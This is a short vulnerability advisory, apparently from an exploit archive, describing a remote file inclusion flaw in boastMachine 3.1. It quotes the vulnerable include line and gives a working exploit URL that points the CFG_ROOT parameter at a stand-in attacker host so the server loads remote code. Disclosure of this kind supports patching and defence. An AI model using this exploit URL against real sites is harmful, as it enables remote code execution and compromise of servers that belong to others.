boastMachine version 3.1 suffers from a remote file inclusion vulnerability.
4f2ec29445f9878ca1658de8da22bb811563d3a8c743126100a2315dc41ef755
***************************************** *
*AuThor:Silitoad ************************ *
*emA!l:Silitoad[at]hotmail[dot]Com ****** *
*HoMePaGe:http://www.Arabian-FighterZ.com *
***************************************** *
Powered By Silitoad From Arabian-Fighterz
[Info]
cms:boastMachine v3.1
website:http://boastology.com
download:http://boastology.com/pages/dload.php?id=bmachine-3.1.zip
bug: GENERAL/COMMON FUNCTIONS
include_once CFG_ROOT."/inc/core/show.inc.php";
[Vuls]
[Exploit]
http://target/bmachine-3.1/bmachine/bmc/functions.php?CFG_ROOT=http://evilcode.txt
?
[Fix]
Vuls has been reported to author,No reply yet...
[Greetings]
Greets To Linux_m,l1nuxm4,Sn1p8r,Sbitar,Op3runix